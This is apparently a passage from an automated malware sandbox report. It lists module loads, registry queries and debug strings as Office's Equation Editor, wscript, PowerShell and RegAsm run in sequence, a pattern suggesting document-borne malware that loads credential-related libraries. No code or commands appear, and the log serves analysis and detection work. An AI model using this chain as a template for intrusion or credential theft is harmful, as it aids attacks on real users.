                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: shcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: nlaapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: atl.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pstorec.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: atl.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
